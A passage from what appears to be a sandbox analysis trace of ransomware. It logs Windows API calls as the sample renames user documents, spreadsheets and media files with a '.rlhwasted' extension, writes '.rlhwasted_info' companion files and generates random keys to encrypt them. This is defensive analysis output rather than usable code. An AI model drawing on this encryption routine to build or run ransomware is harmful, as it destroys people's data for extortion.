lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.116] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0188.116] lstrcpyW (in: lpString1=0x6d4600, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0188.116] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\klnwP9N7zks3v.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\klnwp9n7zks3v.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\klnwP9N7zks3v.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\klnwp9n7zks3v.swf.rlhwasted")) returned 1 [0188.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\klnwP9N7zks3v.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\klnwp9n7zks3v.swf.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0188.117] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0188.117] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x1488c [0188.117] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1488c) returned 0xb00000 [0188.117] CloseHandle (hObject=0x104) returned 1 [0188.123] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0188.124] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0188.124] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.124] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0188.124] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0188.125] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.137] SetEndOfFile (hFile=0x10c) returned 1 [0188.140] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0188.140] CloseHandle (hObject=0x10c) returned 1 [0188.142] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0188.142] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fbb40 | out: hHeap=0x6b0000) returned 1 [0188.142] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0188.143] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0188.143] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.143] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\z4XsxQdvQM.pptx") returned 62 [0188.143] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x286) returned 0x6d4580 [0188.143] lstrcpyW (in: lpString1=0x6d45fc, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0188.143] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef298 [0188.143] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0188.144] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef298 | out: pbBuffer=0x6ef298) returned 1 [0188.144] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\z4XsxQdvQM.pptx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\z4xsxqdvqm.pptx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0188.145] WriteFile (in: hFile=0x10c, lpBuffer=0x6ef298*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef298*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0188.157] SetEndOfFile (hFile=0x10c) returned 1 [0188.193] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.193] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0188.193] lstrcpyW (in: lpString1=0x6d45fc, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0188.193] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\z4XsxQdvQM.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\z4xsxqdvqm.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\z4XsxQdvQM.pptx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\z4xsxqdvqm.pptx.rlhwasted")) returned 1 [0188.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\z4XsxQdvQM.pptx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\z4xsxqdvqm.pptx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0188.194] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0188.194] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x15fe8 [0188.194] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15fe8) returned 0xb00000 [0188.194] CloseHandle (hObject=0x124) returned 1 [0188.200] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f98) returned 1 [0188.201] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0188.201] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0188.201] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f98) returned 1 [0188.202] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0188.202] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0188.212] SetEndOfFile (hFile=0x10c) returned 1 [0188.214] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0188.214] CloseHandle (hObject=0x10c) returned 1 [0188.217] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0188.217] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fbd00 | out: hHeap=0x6b0000) returned 1 [0188.217] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f98) returned 1 [0188.218] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0188.218] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0188.218] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qiodZo-r.mkv") returned 54 [0188.218] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x276) returned 0x6d4580 [0188.218] lstrcpyW (in: lpString1=0x6d45ec, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0188.218] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0188.218] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f98) returned 1 [0188.219] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0188.219] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0188.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qiodZo-r.mkv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qiodzo-r.mkv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0188.219] WriteFile (in: hFile=0x10c, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0188.221] SetEndOfFile (hFile=0x10c) returned 1 [0188.221] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.221] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0188.221] lstrcpyW (in: lpString1=0x6d45ec, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0188.221] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qiodZo-r.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qiodzo-r.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qiodZo-r.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qiodzo-r.mkv.rlhwasted")) returned 1 [0188.221] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qiodZo-r.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qiodzo-r.mkv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0188.222] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0188.222] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x10acd [0188.222] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10acd) returned 0xb00000 [0188.222] CloseHandle (hObject=0x104) returned 1 [0188.390] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0188.391] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0188.391] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.391] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0188.392] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0188.392] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.403] SetEndOfFile (hFile=0x10c) returned 1 [0188.417] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fb420 | out: hHeap=0x6b0000) returned 1 [0188.417] CloseHandle (hObject=0x10c) returned 1 [0188.420] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0188.421] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f01a0 | out: hHeap=0x6b0000) returned 1 [0188.421] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0188.422] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0188.422] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\51LG8hH H9MvqOtk.pptx") returned 65 [0188.422] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28c) returned 0x6d4580 [0188.422] lstrcpyW (in: lpString1=0x6d4602, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0188.422] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fb420 [0188.422] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0188.423] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6fb420 | out: pbBuffer=0x6fb420) returned 1 [0188.423] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\51LG8hH H9MvqOtk.pptx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\51lg8hh h9mvqotk.pptx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0188.424] WriteFile (in: hFile=0x10c, lpBuffer=0x6fb420*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6fb420*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0188.425] SetEndOfFile (hFile=0x10c) returned 1 [0188.425] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.425] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fb420 | out: hHeap=0x6b0000) returned 1 [0188.425] lstrcpyW (in: lpString1=0x6d4602, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0188.425] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\51LG8hH H9MvqOtk.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\51lg8hh h9mvqotk.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\51LG8hH H9MvqOtk.pptx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\51lg8hh h9mvqotk.pptx.rlhwasted")) returned 1 [0188.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\51LG8hH H9MvqOtk.pptx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\51lg8hh h9mvqotk.pptx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0188.427] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0188.427] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x10227 [0188.427] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10227) returned 0xb00000 [0188.427] CloseHandle (hObject=0x124) returned 1 [0188.432] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0188.433] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0188.433] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.433] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0188.434] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0188.434] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.754] SetEndOfFile (hFile=0x10c) returned 1 [0188.757] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0188.757] CloseHandle (hObject=0x10c) returned 1 [0188.758] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0188.759] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fc048 | out: hHeap=0x6b0000) returned 1 [0188.759] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0188.760] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0188.760] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.760] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cV1eyZnSvslDW6VqZQYZ.docx") returned 69 [0188.760] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x294) returned 0x6d4580 [0188.760] lstrcpyW (in: lpString1=0x6d460a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0188.760] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0188.760] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0188.760] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0188.761] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cV1eyZnSvslDW6VqZQYZ.docx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cv1eyznsvsldw6vqzqyz.docx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0189.254] WriteFile (in: hFile=0x10c, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0189.255] SetEndOfFile (hFile=0x10c) returned 1 [0189.255] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.255] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.255] lstrcpyW (in: lpString1=0x6d460a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0189.255] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cV1eyZnSvslDW6VqZQYZ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cv1eyznsvsldw6vqzqyz.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cV1eyZnSvslDW6VqZQYZ.docx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cv1eyznsvsldw6vqzqyz.docx.rlhwasted")) returned 1 [0189.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cV1eyZnSvslDW6VqZQYZ.docx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cv1eyznsvsldw6vqzqyz.docx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0189.256] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0189.256] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x11cb3 [0189.256] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11cb3) returned 0xb00000 [0189.257] CloseHandle (hObject=0x110) returned 1 [0189.261] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0189.262] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0189.262] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.262] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0189.263] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0189.263] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.273] SetEndOfFile (hFile=0x10c) returned 1 [0189.275] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.276] CloseHandle (hObject=0x10c) returned 1 [0189.277] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0189.277] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fc208 | out: hHeap=0x6b0000) returned 1 [0189.277] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0189.278] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0189.278] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.278] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\guYv-2.xlsx") returned 55 [0189.278] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x278) returned 0x6d4580 [0189.278] lstrcpyW (in: lpString1=0x6d45ee, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0189.279] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0189.279] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0189.279] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0189.279] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\guYv-2.xlsx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\guyv-2.xlsx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0189.280] WriteFile (in: hFile=0x10c, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0189.281] SetEndOfFile (hFile=0x10c) returned 1 [0189.281] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.281] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.281] lstrcpyW (in: lpString1=0x6d45ee, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0189.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\guYv-2.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\guyv-2.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\guYv-2.xlsx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\guyv-2.xlsx.rlhwasted")) returned 1 [0189.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\guYv-2.xlsx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\guyv-2.xlsx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 